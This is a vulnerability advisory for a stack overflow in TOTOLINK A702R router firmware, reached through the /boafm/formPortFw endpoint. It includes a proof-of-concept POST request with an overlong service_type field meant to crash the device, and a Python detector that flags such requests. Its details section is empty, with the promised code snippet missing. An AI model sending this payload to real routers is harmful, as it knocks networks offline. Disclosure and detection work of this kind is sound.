# Critical Vulnerability

## Information Overview

- **Vendor:** TOTOLINK
- **Product:** A702R
- **Version:** V4.0.0-B20230721.1521
- **Type:** Stack Overflow

## Vulnerability Description

The TOTOLINK A702R router running firmware version V4.0.0-B20230721.1521 is affected by a severe buffer overflow vulnerability. The vulnerability can be triggered via the router's `/boafm/formPortFw` endpoint. Attackers can exploit it by sending a malicious HTTP POST request to perform a Denial of Service (DoS) attack.

## Vulnerability Details

The buffer overflow occurs in the following code snippet:

## POC (Proof of Concept)

```http
POST /boafm/formPortFw HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 1071
Origin: http://192.168.0.1
Connection: keep-alive
Referer: http://192.168.0.1/title.htm

sessionCheck=65d7926158c4ad1116d49b8f27a5220d&addPortFw=a&service_type=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
```
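
A defender-side check for the request shape shown in the PoC, as an added example that is not part of the original advisory: it parses a raw HTTP request and reports form fields in POSTs to `/boafm/formPortFw` whose values exceed a length limit. The 64-character limit, the `/boafm/formOther` path and the sample requests are assumptions constructed for illustration.

```python
from urllib.parse import parse_qsl

WATCHED_PATH = "/boafm/formPortFw"  # endpoint named in the advisory's PoC
MAX_FIELD_LEN = 64                  # assumption: tune to the longest legitimate value

def parse_request(raw: bytes):
    """Split a raw HTTP/1.x request into (method, path, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    parts = lines[0].split(" ")
    if len(parts) != 3:
        raise ValueError("malformed request line")
    method, target, _version = parts
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return method, target.split("?", 1)[0], headers, body

def oversized_fields(raw: bytes, limit: int = MAX_FIELD_LEN):
    """Return [(field, length)] for form fields over `limit` in POSTs to the watched path."""
    try:
        method, path, headers, body = parse_request(raw)
    except ValueError:
        return []
    if method != "POST" or path != WATCHED_PATH:
        return []
    ctype = headers.get("content-type", "").lower()
    if not ctype.startswith("application/x-www-form-urlencoded"):
        return []
    fields = parse_qsl(body.decode("latin-1"), keep_blank_values=True)
    return [(name, len(value)) for name, value in fields if len(value) > limit]

def build(path: str, body: str) -> bytes:
    """Build a constructed sample request (not captured traffic)."""
    return (f"POST {path} HTTP/1.1\r\nHost: 192.168.0.1\r\n"
            "Content-Type: application/x-www-form-urlencoded; charset=UTF-8\r\n"
            f"Content-Length: {len(body)}\r\n\r\n{body}").encode("latin-1")

# Constructed samples: a short value, an overlong value, and a hypothetical other path.
NORMAL = build(WATCHED_PATH, "sessionCheck=0000&addPortFw=a&service_type=http")
OVERLONG = build(WATCHED_PATH, "sessionCheck=0000&addPortFw=a&service_type=" + "a" * 200)
OTHER = build("/boafm/formOther", "x=" + "a" * 200)

if __name__ == "__main__":
    for label, req in (("normal", NORMAL), ("overlong", OVERLONG), ("other", OTHER)):
        print(label, oversized_fields(req))
```

The same length check can be expressed as a rule in a reverse proxy or IDS placed in front of the management interface.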